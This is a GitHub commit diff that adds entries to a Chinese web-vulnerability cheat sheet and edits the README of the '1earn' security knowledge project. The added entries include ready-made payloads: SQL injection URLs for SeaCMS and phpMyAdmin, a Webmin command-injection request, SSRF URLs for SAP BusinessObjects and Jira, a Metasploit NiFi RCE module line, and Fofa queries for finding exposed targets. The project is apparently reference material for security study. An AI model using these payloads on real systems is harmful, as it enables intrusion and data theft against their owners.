forked from ffffffff0x/1earn
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
130 additions
and
24 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -29,6 +29,7 @@ | |
* [October](#october) | ||
* [php7cms](#php7cms) | ||
* [RuoYi](#ruoyi) | ||
* [SeaCMS](#seacms) | ||
* [ShopXO](#shopxO) | ||
* [SiteServer](#siteserver) | ||
* [ThinkAdmin](#thinkadmin) | ||
|
@@ -43,6 +44,8 @@ | |
* [Yii](#yii) | ||
* [YxCMS](#yxcms) | ||
* [zcncms](#zcncms) | ||
* [Zend](#zend) | ||
* [五指cms](#五指cms) | ||
|
||
* **[框架引擎中间件](#框架引擎中间件)** | ||
* [ActiveMQ](#activemq) | ||
|
@@ -58,14 +61,17 @@ | |
* [httpd](#httpd) | ||
* [IIS](#iis) | ||
* [JBOSS](#jboss) | ||
* [Jetty](#jetty) | ||
* [Nacos](#nacos) | ||
* [Resin](#resin) | ||
* [Nginx](#nginx) | ||
* [RabbitMQ](#rabbitmq) | ||
* [RocketMQ](#rocketmq) | ||
* [shiro](#shiro) | ||
* [Solr](#solr) | ||
* [Spring](#spring) | ||
* [Struts2](#struts2) | ||
* [Tapestry](#tapestry) | ||
* [Tomcat](#tomcat) | ||
* [Weblogic](#weblogic) | ||
* [Websphere](#websphere) | ||
|
@@ -110,7 +116,9 @@ | |
* [JumpServer](#jumpserver) | ||
* [Jupyter](#jupyter) | ||
* [log4j](#log4j) | ||
* [MinIO](#minio) | ||
* [Nexus](#nexus) | ||
* [NiFi](#niFi) | ||
* [nodejs](#nodejs) | ||
* [noVNC](#novnc) | ||
* [OFBiz](#ofbiz) | ||
|
@@ -119,6 +127,7 @@ | |
* [PHP-FPM](#php-fpm) | ||
* [PHPUnit](#phpunit) | ||
* [PHPMailer](#phpmailer) | ||
* [SaltStack](#SaltStack) | ||
* [SkyWalking](#skywalking) | ||
* [Smartbi](#smartbi) | ||
* [Supervisord](#supervisord) | ||
|
@@ -150,6 +159,8 @@ | |
* [帆软](#帆软) | ||
* [万户](#万户) | ||
* [红帆](#红帆) | ||
* [金和](#金和) | ||
* [华天](#华天) | ||
|
||
* **[Other](#other)** | ||
|
||
|
@@ -614,6 +625,22 @@ zSyK5Kp6PZAAjlT+eeNMlg== | |
|
||
--- | ||
|
||
### SeaCMS | ||
|
||
> Fofa: app="海洋CMS" | ||
|
||
**CVE-2020-21378 后台SQL注入漏洞** | ||
- 描述 | ||
|
||
攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。 | ||
|
||
- POC | Payload | exp | ||
``` | ||
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1) | ||
``` | ||
|
||
--- | ||
|
||
### ShopXO | ||
|
||
**CNVD-2021-15822 任意文件读取漏洞** | ||
|
@@ -845,6 +872,12 @@ Content-Disposition: form-data; name="couponid" | |
|
||
--- | ||
|
||
### UCMS | ||
|
||
**CVE-2020-25483 后台文件上传漏洞** | ||
- 文章 | ||
- [UCMS文件上传漏洞(CVE-2020-25483)复现](https://blog.csdn.net/xuandao_ahfengren/article/details/110233085) | ||
|
||
### vBulletin | ||
|
||
**vBulletin 5.6.1 SQL 注入** | ||
|
@@ -1742,14 +1775,6 @@ ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布 | |
|
||
--- | ||
|
||
### Nginx | ||
|
||
**CVE-2021-23017** | ||
- 相关文章 | ||
- [对 Nginx DNS 解析漏洞的应急响应](https://www.tr0y.wang/2021/05/28/CVE-2021-23017/) | ||
|
||
--- | ||
|
||
### Resin | ||
|
||
> 官网 : https://caucho.com/ | ||
|
@@ -1763,6 +1788,14 @@ ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布 | |
|
||
--- | ||
|
||
### Nginx | ||
|
||
**CVE-2021-23017** | ||
- 相关文章 | ||
- [对 Nginx DNS 解析漏洞的应急响应](https://www.tr0y.wang/2021/05/28/CVE-2021-23017/) | ||
|
||
--- | ||
|
||
### RabbitMQ | ||
|
||
> Fofa: app="RabbitMQ" | ||
|
@@ -2049,6 +2082,7 @@ Solr 的漏洞参考 https://issues.apache.org/jira/projects/SOLR/issues | |
- 文章 | ||
- [Spring Security OAuth RCE (CVE-2016-4977) 漏洞分析](https://paper.seebug.org/70/) | ||
- [漏洞复现|CVE-2016-4977(SpringSecurityOauth RCE)](https://mp.weixin.qq.com/s/dHnD3z8BlSFvfkDZ1gVo-g) | ||
- POC | Payload | exp | ||
|
@@ -2662,6 +2696,12 @@ Tomcat 在安装部署后,在 webapps 默认存在一个 examples 目录,该 | |
|
||
Apache Tomcat 中的 WebSocket 存在安全漏洞,该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 | ||
|
||
- 影响版本 | ||
- Apache Tomcat 10.0.0-M1-10.0.0-M6 | ||
- Apache Tomcat 9.0.0.M1-9.0.36 | ||
- Apache Tomcat 8.5.0-8.5.56 | ||
- Apache Tomcat 7.0.27-7.0.104 | ||
|
||
- 文章 | ||
- [CVE-2020-13935复现与浅析](https://www.freebuf.com/vuls/256004.html) | ||
|
||
|
@@ -3987,6 +4027,7 @@ jira 的漏洞参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13 | |
- Atlassian Jira 7.6.0 ~ 8.4.0 | ||
- POC | Payload | exp | ||
- `/plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected]` | ||
- [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451) | ||
**CVE-2019-11581 Atlassian Jira 模板注入漏洞** | ||
|
@@ -4068,6 +4109,14 @@ Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记 | |
--- | ||
### MinIO | ||
**CVE-2021-21287 MinIO未授权SSRF漏洞** | ||
- 文章 | ||
- [容器与云的碰撞——一次对MinIO的测试](https://cloud.tencent.com/developer/article/1785462) | ||
--- | ||
### Nexus | ||
> 官网 : https://www.sonatype.com/product-nexus-repository | ||
|
@@ -4106,6 +4155,18 @@ admin admin123 | |
--- | ||
### NiFi | ||
> Fofa: "nifi" && title=="NiFi" | ||
**NiFi Api 远程代码执行** | ||
- POC | Payload | exp | ||
``` | ||
use exploit/multi/http/apache_nifi_processor_rce | ||
``` | ||
--- | ||
### nodejs | ||
**nodejs debug/inspect RCE** | ||
|
@@ -4239,6 +4300,13 @@ admin admin123 | |
- [PHPmyadmin SQL injection in Designer feature 研究(CVE-2019-18622)](https://xz.aliyun.com/t/6960) | ||
- https://github.com/phpmyadmin/phpmyadmin/issues/15651 | ||
**CVE-2020-26935 phpmyadmin后台SQL注入** | ||
- POC | Payload | exp | ||
``` | ||
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) | ||
``` | ||
--- | ||
### PHP | ||
|
@@ -4754,6 +4822,16 @@ PHP-FPM 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说 | |
- POC | Payload | exp | ||
- [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) | ||
**CVE-2020-35606** | ||
- POC | Payload | exp | ||
``` | ||
/package-updates/update.cgi | ||
application/x-www-form-urlencoded | ||
redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26 | ||
``` | ||
--- | ||
### XenMobile | ||
|
@@ -4854,6 +4932,18 @@ zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组 | |
- [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON) | ||
- [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit) | ||
**CVE-2020-6308** | ||
- 描述 | ||
SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络 | ||
- POC | Payload | exp | ||
``` | ||
/AdminTools/querybuilder/logon?framework= | ||
aps=xxx.dnslog.cn&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp | ||
``` | ||
--- | ||
### 蓝凌 | ||
|
@@ -6090,7 +6180,7 @@ group-admin/123456 | |
--- | ||
### 华天动力OA | ||
### 华天 | ||
> Fofa : app="华天动力-OA8000" | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -16,9 +16,9 @@ | |
</p> | ||
|
||
* **简介** : 本项目的初衷是分享知识资源,让更多人接触和了解安全、运维领域,但受限于本人能力有限,难免会有错误和借鉴的地方,对于内容中有疑问或建议请提交 issue. | ||
* **定位** : 个人维护的安全知识框架 | ||
* **定位** : ffffffff0x 团队维护的安全知识框架 | ||
* **更新时间** : 不定期 | ||
* **项目地址** : https://github.com/No-Github/1earn | ||
* **项目地址** : https://github.com/ffffffff0x/1earn | ||
* **学习线路图** : 初学者或想快速构建知识结构请访问 [roadmap](roadmap.md) | ||
|
||
--- | ||
|
@@ -240,7 +240,7 @@ | |
|
||
## 联系我 | ||
|
||
- [email protected] | ||
- 如果你有任何其他方面的问题或建议,可以在 issue 提出或发送邮件至 [email protected] | ||
|
||
--- | ||
|
||
|
@@ -252,3 +252,7 @@ | |
- <sup>署名 — 您必须给出适当的署名,提供指向本许可协议的链接,同时标明是否(对原始作品)作了修改。您可以用任何合理的方式来署名,但是不得以任何方式暗示许可人为您或您的使用背书。</sup> | ||
- <sup>没有附加限制 — 您不得适用法律术语或者 技术措施 从而限制其他人做许可协议允许的事情。</sup> | ||
- <sup>注: 本项目所有文件仅供学习和研究使用,请勿使用项目中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.</sup> | ||
|
||
--- | ||
|
||
> create by ffffffff0x |